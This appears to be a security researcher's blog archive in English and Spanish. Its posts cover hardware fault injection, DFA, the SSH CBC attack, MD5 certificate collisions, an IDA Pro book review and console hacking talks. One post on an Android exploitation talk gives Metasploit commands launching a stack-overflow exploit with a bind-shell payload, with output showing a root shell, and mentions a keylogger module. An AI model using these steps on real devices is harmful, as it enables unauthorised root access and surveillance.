So you read my last post and were left wondering how the heck you would be able to inject temporary faults into hardware devices? Here is your answer 🙂
In that post, I explained how to extract keys from cipher implementations assuming we could somehow inject faults during the execution of the cipher. Besides DFA attacks, I also said we could achieve something similar to what we do with software protections (i.e. modifying control flow, bypassing checks, etc.) using fault injection techniques. I thought it was worth giving a few examples of how to inject faults in real hardware to complete the picture.
When hardware is designed, it is engineered to work under certain conditions of temperature, input voltage ranges, clock frequencies, etc. The hardware is tested under those conditions and is supposed to function in that range... and there are no guarantees that it will operate correctly if you bring it outside them.
I guess you follow my reasoning already 🙂 So if we want to inject faults into hardware, a good place to start looking is exactly in those gray areas around the operating conditions. Of course, we want the chip to be functioning properly most of the time, and we want it to fail at the precise moment at which it is computing something sensitive (say a secure boot check, or an RSA-CRT signature). Thus, we probably need to have some control over the timing, and inject the fault only temporarily.
In this post I am introducing from an intuitive perspective three ways of injecting faults: voltage, clock and laser/optical glitching.
The first example I want to touch on is that of voltage (or VCC) glitching. In this case, we typically run the chip at its nominal voltage (say 3.3V), and whenever we want to inject a fault, we drop voltage down to e.g. 1V.
At this moment, the input voltage to certain gates within the chip will be too low due to the lack of supply voltage. Thus, these gates will receive an input voltage which is below the threshold that indicates whether the signal is a zero or a one, no matter what value it was supposed to be.
Then we increase the voltage again to the nominal voltage of 3.3V, and we have a functioning chip that just failed to execute one of its operations. For instance, it failed to execute a conditional jump and fell through to the code that we wanted to have executed.
The trick here is to find the proper parameters for the glitch: voltage drop (do we go to 0V, to 0.4V, to 1V ...), length of the glitch (a few nanoseconds, a few microseconds?) and the timing. Typically, if voltage drop and length of glitch are too small, the chip will function properly. If they are too large, it will just die (mute, reset, or maybe even physically damaged). Of course, if the timing is wrong then the attacker will never see the effects he wants to see.
As a protection against this kind of glitching, most modern smart cards and some embedded devices incorporate voltage sensors that detect whether the voltage went below a certain value or not. However, this attack is still effective against a wide range of products.
Clock glitching is similar to VCC glitching in the sense that it affects another critical parameter of the chip that can be controlled by the attacker. In this case, what we do is injecting spurious clock cycles that are way shorter than the original clock cycle.
Since the internal logic of the chip operates based on its clock, a short clock cycle will trigger a new operation before the results of the previous one were completely computed or propagated through the device.
Imagine you have to multiply two values, and then add a third value to them. Normally, multiplying values takes longer than adding them up. Thus, the clock frequency for a chip that only performs these two operations would be long enough for the multiplication to occur and its result to be ready at the input of the next stage, since that is the critical operation.
Now, if I tell you to start adding up before you received the multiplication result, you will be using invalid (old?) data instead of the correct result. Thus, you will fail at computing the correct result.
Clock glitching exploits exactly that situation. Again, finding the right parameters in this case is the key to success.
As for hardware level protections, frequency sensors as well as using internally generated clocks (using on-die oscillators) are generally the most common ways to protect against clock glitching.
Additionally, fast clocks make these attacks less practical for attackers, since they need to inject even faster clock cycles and synchronize their attack at a higher speed.
This is why clock glitching is less effective nowadays: most high-end smart cards use their own on-die clocks, and embedded systems require much higher clock speeds.
After clock and VCC glitching, we move to the real king of current fault injection attacks. Optical fault injection, or most commonly Laser fault injection, uses a light beam to inject faults into semiconductor devices.
How is this possible? Well, light (physicists, don't kill me!) basically consists of a number of photons carrying a certain amount of energy. Roughly, when these photons reach a semiconductor (typically silicon in electronic devices), their energy is absorbed by the semiconductor.
Given enough energy, electrons that would otherwise be still within the semiconductor will start to move, creating current. So, for our chips, this means that some of the transistors in the chip will actually switch when they should not!
The big difference between this fault injection technique and the previous ones is that in this case we actually have spatial selectivity (or resolution): we can choose which parts of the chip we attack by pointing the laser beam to them.
Of course, this is very powerful but at the same time it adds extra complexity to the attack: now you need to find the sensitive spots in the chip. As before, there are a number of parameters one needs to play with in order to successfully inject faults: glitch timing, glitch length, wavelength of the injected light and amount of energy injected.
Also, this attack is semi-invasive: we need to open up the chip package so that the light radiation can reach the die. Otherwise, the light will be blocked by the package or the plastic around the smart card die. Thus, this attack provides additional power at the cost of additional complexity, as usual.
In terms of hardware level protections, this is also the most difficult attack to prevent. Typically light sensors are scattered around the chip, but manufacturers cannot place sensors everywhere (that's expensive!) so there is always open spots.
At the end of the day, fault injection protection requires a combination of hardware and software prevention and detection mechanisms: typically sensors at the hardware level and double-checks and redundancy at the software side.
Due to the difficulty of completely preventing this kind of attacks, fault injection attacks are nowadays one of the main threats to secure hardware. Additionally, this difficulty together with the physical nature of the attacks also means that simulating them is typically not enough to assure appropriate protection levels, making fault injection testing key for secure hardware.
So, after more than a year without writing anything here, I was bored today and thought it would be nice to share a new piece on attacking cryptographic implementations here 🙂
Differential Fault Analysis (DFA) attacks are part of what is known as fault injection attacks. This is, they are based on forcing a cryptographic implementation to compute incorrect results and attempt to take advantage from them. With fault injection attacks (also often called active side channel attacks) one can achieve things like unauthenticated access to sensitive functionality, bypassing secure boot implementations, and basically bypassing any security checks an implementation performs.
With DFA attacks, one is able to retrieve cryptographic keys by analyzing correct/faulty output pairs and comparing them. Of course, this assumes you are able to inject faults somehow... which is often true in hardware implementations: gaming consoles, STBs, smart cards, etc. At the software level, one can achieve similar things by debugging the implementation and changing data or by patching instructions... but this is something we have been doing for a long time, haven't we? 🙂 I often say that fault injection attacks are the analog version of 'nopping' instructions out in a program, although we often do not know exactly what kind of faults we are injecting (i.e. we often miss a fault model, but we still successfully attack implementations in this way).
There are ways to protect against this kind of attack as an application programmer, but this is not the objective of this post. In the remainder of this post, I will explain two powerful DFA attacks on two modern cryptographic algorithms: RSA and (T)DES. For some information on protecting from these attacks as a programmer, take a look at these slides. If there is some interest, I will outline the most common techniques to perform fault attacks in a future post.
It's been almost a month since RootedCON, but I didn't have any time to spend on preparing the .tgz file with the example shellcodes, poc apps and exploits we showed during our talk. And neither did I publish any kind of summary or anything about the event...
Examples from our presentation on Android exploitation
First things first, here is the examples we used during the presentation. As a quick summary, this is how I use the buffer overflow exploit.
First, launch the emulator and wait for it to start. Then, with adb you need to forward a couple of ports: 2000 for the vulnerable apps and whatever you like for your bind shell. Then you can launch the binary, which I had uploaded using adb push to /data/bin/myapp:
eloi@EloiLT:~/android/paper$ adb forward tcp:2000 tcp:2000 eloi@EloiLT:~/android/paper$ adb forward tcp:2222 tcp:2222 eloi@EloiLT:~/android/paper$ adb shell # /data/bin/myapp
Now, you can launch the exploit from metasploit:
msf > use exploit/linux/misc/android_stack msf exploit(android_stack) > set payload linux/armle/shell_bind_tcp payload => linux/armle/shell_bind_tcp msf exploit(android_stack) > set RPORT 2000 RPORT => 2000 msf exploit(android_stack) > set LPORT 2222 LPORT => 2222 msf exploit(android_stack) > exploit [*] Started bind handler [*] Command shell session 1 opened (127.0.0.1:55207 -> 127.0.0.1:2222) [*] Command shell session 1 closed. msf exploit(android_stack) > exploit [*] Started bind handler [*] Command shell session 2 opened (127.0.0.1:34834 -> 127.0.0.1:2222) /system/bin/id uid=0(root) gid=0(root) exit [*] Command shell session 2 closed. msf exploit(android_stack) >
The same thing applies to the cpp_challenge demo application. You just use a different exploit, but that's it. Beware that you might have to tune some addresses on your local installation, as they are hardcoded. However, I believe they should be static for every installation.
In addition to apps and the metasploit stuff, you can also find two kernel modules. One is a simple find syscall table module, and the other one is a keyboard logger. The latter only works for linux >= 2.6.28, for earlier versions you need to change it slightly.
I won't spend much time on it, as it's been quite some time already and I don't feel like writing a complete summary of it.
Overall I think it was a great event. Sure there is stuff that can be improved as everywhere, but for being the first edition it was very good. From the talks I attended, in my opinion there were great talks but also a one or two I didn't really like. On our side, we are pretty happy with the way it was received and the reactions we have seen 🙂
Besides the talks, and probably even more important, it was great to meet so many people that I'd only know through the Internet otherwise. Cheers to all of you guys, hope to see you next year at RootedCON or maybe earlier somewhere else 🙂
Last week a rumor about a 0 day exploit on OpenSSH being actively exploited arose. In some places I found links to Bugtraq's note about the OpenSSH attack published in a paper of the Royal Holloway University of London back in November 2008.
The paper, Plaintext Recovery Attacks Against SSH, describes an attack which provides knowledge of 32 bits from an arbitrary ciphertext block from an SSH connection when CBC mode is used. Personally, I didn't read the paper when it was published, I just took a quick look at it and I didn't feel like reading it completely.
However, when I saw the generated stir around this issue I thought it was time to take it again. And this post is the result: an attempt to explain how the attack described in this paper works.
SSH Binary Packet Protocol
SSH BPP is the protocol in charge of defining the binary packet structure of SSH, which supports the encrypted packets that conform an SSH connection. A data packet in an SSH connection is encoded as follows:
The Length field ( 4 bytes) indicates the size of the remainder of the packet. The Padding length field (1 byte) encodes the length of the final padding, which makes the packet a multiple of the block size. After this field, the message is added, and finally the padding, which has to be between 4 and 255 bytes of random data.
Two cryptographic operations are applied to this message: an encryption and a MAC. The MAC is computed over a sequence number which is never transmitted (it is kept by the two ends of the communication) concatenated with the original message depicted above. The encryption is applied to the original message only.
Therefore, when SSH recieves a packet, the first thing it has to do is decrypting the first ciphertext block to obtain the message length. Then, it waits to decrypt as many bytes as the packet indicates, in order to decrypt them and check its integrity with the MAC, which provides message authentication and protects your SSH sessions against modification while they are traveling from client to server.
SSH BPP's problem
The problem with SSH BPP described in the paper is a consequence of the combination of several factors. On one side, we have that OpenSSH returns different error messages for different situations: when the decrypted length does not pass some sanity checks (e.g. it is not a multiple of the block size) and when the computed MAC does not match with the valid one. Therefore, observing the error messages one can obtain information on what caused the interruption of the connection.
On the other hand, we have that the first block indicates how many bytes the server waits for before calculating the complete MAC. Therefore, assuming the sanity checks over the message length are passed, an attacker could inject a data block, and then inject block by block until the server says "Hey, wait, the MAC does not match!".
At that point, the attacker knows that after decrypting the injected block with the server's key, the result contains in its right-most 32 bits a value equal to the number of blocks injected in the connection.
But now the complicated part starts, because the attacker needs to link these obtained 32 bits with the 32 bits that the original packet held. If the packet was encrypted with a completely unrelated key, then knowing that decrypting it under a different key gives a certain value provides basically no information on the original message.
But here CBC mode comes to play. We already know from our previous block ciphers post that this mode performs an XOR of the previous encrypted block with the current plaintext block before encrypting it with a fixed key.
Let's assume we want to obtain data from a previous packet , which is part of the current SSH connection. After decrypting it we would have:
But when we inject it into the connection, assuming the previous ciphertext block is known, , then the SSH server will compute this:
So, it will decrypt the injected block, and will XOR it with the previous block. This result will be regarded as the first block of a packet, and therefore its initial 32 bits will tell the server the packet length.
Thus, we can start injecting new blocks and observing the reaction of the SSH server. Once it returns a MAC error, this means that the initial 32 bits of contain the number of bytes we injected so far.
Further, from the previous two equations we can obtain the following relation:
Where the left-most 32 bits of all values at the right side of the equation are known, and the value at the left side of the equation is what we wanted to obtain. In this way we can get to know the left-most 32 bits of the target block.
Implications of this attack
So, we know how the attack works... now it's time for asking ourselves whether we should be worried about it or not. In principle, the attack is not too complex and allows the retrieval of 32 arbitrary bites of an SSH connection with a probability of . This probability comes from the conditions that need to be satisfied in order to pass the sanity checks after decrypting the injected block.
This means that, on average, an attacker would succeed one out of 262.000 times, forcing the client to reconnect so many times to the server. I'm pretty sure anyone would be tired after 3 consecutive attemps and would think that something is wrong ;-).
Further, the attacker needs to perform a man in the middle to be able to inject data into the connection. In local area networks it's not a big deal, but over the Internet it gets more complicated.
And even then, an attacker would have 32 bits of data, 4 ASCII characters of your password... which I hope has some more than that :D. Therefore, in my opinion the attack does not have practical implications, although it's always good to update to a patched version and/or use a mode different than CBC.
What this attack actually does is contributing as an interesting example of how important details are in crypto applications and protocols. If the protocol would not depend on a length field which needs to be decrypted for waiting such a number of bytes, or would not use CBC mode or simply would not return additional information about errors (simply closing the connection indicating that something was wrong, regardless of what this something is), none of this would be possible.
Take a look at his post, it's a typical problem found in string/array comparisons, and you should take it into account when programming embedded devices and any other security-related code in general.
PD: I said very soon, didn't I? 😛
Ayer día 30 se publicó en el CCC una vulnerabilidad en la PKI de Internet, explicando cómo se había conseguido tener un certificado perfectamente válido para la mayoría de los navegadores web pero con datos falsos. Se obtuvo un certificado firmado por una autoridad de certificación (CA) de confianza en la mayoría de navegadores, al que se le pudieron cambiar los datos de identidad: la CA firmó un certificado, pero se obtuvo otro derivado para el que la misma firma sigue siendo válida y los datos se han modificado arbitrariamente.
El ataque fue publicado por un grupo de investigadores, contando entre ellos con Benne de Weger, profesor de la TU Eindhoven que me dio clase de Cryptography 2 el año pasado.
¿Cómo es posible esto?
Básicamente, se ha usado la misma técnica que para la predicción de presidentes de los EE.UU. de la que ya hablé hace un tiempo. Se ha obtenido un certificado válido para un sitio aparentemente legal en una CA de confianza, y luego se ha creado un certificado que genere colisiones en MD5.
El método exacto es, como ya dije, tener un prefijo del certificado a elección, una sección aleatoria para hacer colisionar algún resultado intermedio del hash MD5, y después una parte final común a ambos certificados. Puesto que a partir de la colisión, ambos documentos son idénticos, el hash MD5 de éstos será el mismo.
Aun así, no es tan fácil buscar la colisión, puesto que hay ciertos elementos que varían entre un certificado y otro y se deben predecir. Por ejemplo, el número de serie del certificado o el periodo de validez de los certificados que nos va a dar la CA.
Para el ataque, los investigadores probaron con diferentes CAs y trataron de predecir estos valores. Finalmente, seis CAs comerciales les dieron certificados que pudieron usar para crear colisiones.
¿Y qué significa esto?
Básicamente, alguien podría crearse su certificado firmado por una de estas entidades para usos maliciosos. Por tanto, podrían hacer un MiTM en conexions SSL sin que vieramos que hay un intruso porque el certificado usado sería aceptado por nuestro navegador sin rechistar.
Ahora bien, es esto realmente un problema taaaan grave? Para empezar, para la mayoría de los usuarios el cartel de 'el certificado no es válido' solo significa algo así como 'tienes que darle a aceptar para entrar'. En esta situación, ni certificados ni leches, no merece la pena perder el tiempo en crearte un certificado válido si los usuarios van a pasar de los mensajes y entrar igualmente.
Además, el problema no es de la PKI sino de MD5. La solución pasa por irnos a otro sistema de hash como SHA-256 o SHA-512, y usar IDs aleatorios para los certificados firmados. Todo lo que se pueda predecir puede llevar a problemas, ya lo vimos con DNS y lo vemos ahora con los certificados.
Como dicen en layer 8:
What I’m here to say is, I don’t really think this matters all that much except to security researchers. Here’s why: normal users’ trust has very little to do with certificates.
Si queréis información técnica de cómo funciona esto exactamente, aquí lo explican todo con detalle. Yo seguro que me he dejado algo... pero solo quería decir que no es taaan malo y que se veía venir después de que publicaran los anteriores ataques a MD5. Y lo mismo con SHA-1, si se sigue usando probablemente acabará en algo muy similar a esto.
[DISCLAIMER: Este post va en inglés puesto que el libro también es en inglés... y a quien le interese lo entenderá]
At the beginning of last month I ordered a copy of The IDA Pro book from Chris Eagle at Amazon. Since reversing has been one of my pending subjects for a while now, and after seeing it recommended by Ilfak's himself, I decided to buy the book. I've just finished my first reading of the whole book, and before going into applying the acquired knowledge I've thought it may be useful to share my opinion with you.
The book is divided into 5 different parts. Part I, Introduction to IDA, covers the very basis about disassembling, reversing and reversing tools, and IDA Pro.
Part II, Basic IDA usage, introduces the reader into the IDA world in chapters 4 to 10. After introducing the user interface and the different IDA displays, Chir Eagle goes into disassembly navigation and manipulation, data types, cross-references and graphing, and finally the different IDA flavours apart from the normal Win32 GUI version (console mode for Windows,Linux,OS X). Chapter 8 about datatypes and data structures also provides a nice covering of C++ reversing, showing how to locate vtables and explaining inheritance relationships among others.
Part III, Advanced IDA usage, extends the IDA knowledge provided in the previous part by discussing its configuration files, library recognition methods, how to extend IDA's knowledge about library functions and, although it is not its main purpose, what can IDA do for us if we want to patch a binary.
Part IV of the book discusses the available options to extend IDA's functionality: IDC scripts, the IDA SDK, plug-in development and processor and loader modules. To be honest, I skipped a big chunk of this part because I believe it is not worth now. I'll just come back to these chapters once I start disassembling things and needing to tailor IDA's functionality to my needs.
Part V discusses how to deal with real-world problems. It starts with a chapter about the different assembly code produced by different compilers for the same source code, and then goes into a very interesting description about obfuscated code analysis (from the static analysis perspective mainly). Next, Eagle gives some hints on how to use IDA for finding vulnerabilities and provides a list of several useful real-world IDA plugins.
Last part of the book, Part VI, discusses the IDA debugger and its integration with the disassembler. This part starts with an introduction chapter, continues with a discussion on its integration with the disassembler and ends with a chapter about remote debugging with IDA.
As you have seen, this book provides a thorough coverage of IDA's capabilities, and gives real world examples. The examples, together with the IDC and plug-in code, make it a very interesting reading for those willing to learn about reversing and about the most popular disassembler these days.
If you'd like to learn how to use IDA efficiently, how to tailor it to your needs and automate your static analysis tasks, this is your book. Definitely, it is worth the money if you want to get into IDA and have a good reference book.
Como os doy poco (pero poco poco) de comer últimamente, aquí vengo con documentos fresquitos e interesantes 🙂
Por un lado, la universidad de Nijmegen publicó no hace mucho un paper sobre sus ataques al chip Mifare Classic de NXP. Se pueden encontrar en su página dedicada a temas de RFID... yo solamente le eché un ojo rápido, aunque el paper promete.
Por otro lado, Wesley McGrew ha publicado en su blog unas transparencias sobre los sistemas de ficheros Ext2/Ext3, sus estructuras de datos y qué cosas interesantes desde el punto de vista del análisis forense pueden tener. Si no conoces cómo funcionan estos filesystems es recomendable echarle un ojo para entender cómo van.
Por último, se ha publicado un nuevo número de Uninformed Magazine. Hay 4 artículos, dos sobre reverse engineering y dos sobre exploitation techniques. La verdad es que todos suenan interesantes... en cuanto tenga tiempo que dedicarle me pondré a ellos.
Que lo disfrutéis!
El maligno ha anunciado que esta noche, a las 20:00, empieza el Reto Hacking IX. El reto cuenta con 10 niveles, y los premios además de puntuar en la general de los retos hacking de este año, son estos (copia-pega de la entrada del maligno):
- Primero: La gloria, la fama, el honor de hacer un solucionario y responder a una entrevista para el lado del mal. Además, una cena y unos cubatas en tu ciudad (como gane quién yo me sé va a ir a Zurich la madre del topo) que quedará para la historia con fotos que no querras-que-vean-tus-descencientes.
UPDATE: El primero se llevará el Badge de la Defcon16
- Segundo: El honor de ser el primer Luser, el gran perdedor, el perdedor oficial. El título honorífico de ser el Luser del Reto Hacking IX y sí, una cena, pero las copas las pagas tú que para eso deberías haber ganado.
UPDATE: El segundo se llevará tres pegatas de la Defcon16
- Tercero: A ti te voy a regalar un libro de hacking para que sigas practicando y así alcances la gloria de ser el campeón o de ser el No Luser.
UPDATE: El tercero se llevará una pegata de la Defcon16
Yo si tengo tiempo me pondré a ratos, aunque en un plazo de una semana presento el PFC y luego vienen fiestas del pueblo, así que no estaré muy libre para ponerme...
Suerte a los que os decidáis!
EDITADO: Ayer estuve pegandole un ratillo cuando llegué a las 9, un poquitín más después de cenar y otro rato cuando volví de dar una vuelta por ahí. La cosa va de romper CAPTCHA's, pasé los niveles 1-5 pero el 6 se me resiste... no veo NADA de momento 😳 .
Las soluciones las estoy haciendo con PHP con libcURL, reutilizando un script que usé en la CampusParty de 2006 (creo). Te suena Javi? xD Esta vez toca hacer cosas 'parecidas' pero hay que saltarse el captcha 1000 veces en 60 minutos, con lo que automatizarlo es clave (y un coñazo la espera xD).
EDITADO 2: Pues ya hay ganador. Kachakil acaba de alzarse con la victoria y con los 10 puntos... el tío está en el top en todos los retos. Enhorabuena desde aquí!
Después de un mes entero sin escribir un post, y teniendo un borrador a medias de la serie sobre verificación de protocolos desde hace eones en el que esperaba aclarar cómo funcionaba eso de los modelos y cómo probar un protocolo de forma más entendible (que ya sé que la teoría es un poco peñazo y cuesta de seguir, a mi personalmente ya me pasó al principio...), escribo éste para ver si así voy cogiendo ganas de escribir cosillas.
Ayer publicaron en pagetable.com una charla dada en Google sobre el sistema de seguridad de la Xbox 360 y cómo se hackeó. Empieza dando una visión de la seguridad en la Xbox I, para ver los problemas que tenía y las posibles soluciones. Seguidamente hace un repaso a la arquitectura de la Xbox 360 y finalmente muestra el hack realizado.
La verdad es que está interesante y da una buena idea de cómo se puede diseñar plataformas hardware de una manera bastante segura. La podéis encontrar en http://www.youtube.com/watch?v=uxjpmc8ZIxM .
Ahora tengo pendiente echarle un ojo a las charlas relacionadas de esta gente. Hay una del último CCC y me han comentado que hay alguna de la Wii, que buscaré y ya comentaré si me parecen interesantes.
Editado: Ya le eché un ojo a la presentación del CCC. Va en la misma línea, explica el mismo bug del Hypervisor mode pero además comenta un timing attack a la comparación del HMAC con memcmp en las Wii vendidas hasta finales de 2007. Y también realizan una demostración de Linux en Xbox360, y al final hablan un poquito de la Wii y de cómo se pueden leer las claves de memoria por no usar RAM cifrada.
La del CCC la podéis encontrar aquí.